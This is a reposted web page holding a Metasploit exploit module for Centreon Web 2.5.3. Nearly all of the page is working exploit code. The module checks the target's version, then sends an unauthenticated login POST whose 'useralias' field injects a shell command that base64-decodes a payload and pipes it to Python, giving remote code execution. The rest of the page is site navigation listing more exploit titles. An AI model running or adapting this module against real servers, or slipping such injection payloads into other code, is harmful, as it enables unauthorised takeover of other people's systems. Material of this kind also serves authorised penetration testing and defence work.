首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)
来源:metasploit.com 作者:h00die 发布时间:2016-07-28  
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
 
  Rank = ExcellentRanking
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'Centreon Web Useralias Command Execution',
        'Description' => %q(
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
          errors.  This functionality can be abused for arbitrary code
          execution, and can be triggered via the login screen prior to
          authentication.
        ),
        'Author'      =>
          [
            'h00die <mike@shorebreaksecurity.com>',         # module
            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'  # discovery
          ],
        'References'  =>
          [
            [ 'EDB', '39501' ]
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => ['python'],
        'Privileged'     => false,
        'Arch'           => ARCH_PYTHON,
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Feb 26 2016'
      )
    )
 
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
      ], self.class
    )
  end
 
  def check
    begin
      res = send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'index.php'),
        'method'    => 'GET'
      )
      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
 
      if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
        vprint_good("Version Detected: #{version}")
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
 
  def exploit
    begin
      vprint_status('Sending malicious login')
      send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'index.php'),
        'method'    => 'POST',
        'vars_post'  =>
        {
          'useralias'   => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
          'password'    => Rex::Text.rand_text_alpha(5)
        }
      )
 
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Barracuda Web App Firewall 8.0
·AXIS Authenticated Remote Comm
·Bellini/Supercook Wi-Fi Yumi S
·VMWare - Setuid vmware-mount P
·Technicolor TC7200 Modem/Route
·Zortam Media Studio 20.60 Buff
·Ubee EVW3226 Modem/Router 1.0.
·Barracuda Web App Firewall/Loa
·PHP 7.0.8 / 5.6.23 / 5.5.37 -
·VUPlayer 2.49 - (.pls) Stack B
·CoolPlayer+ Portable 2.19.6 -
·Drupal Module Coder < 7.x-1.3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved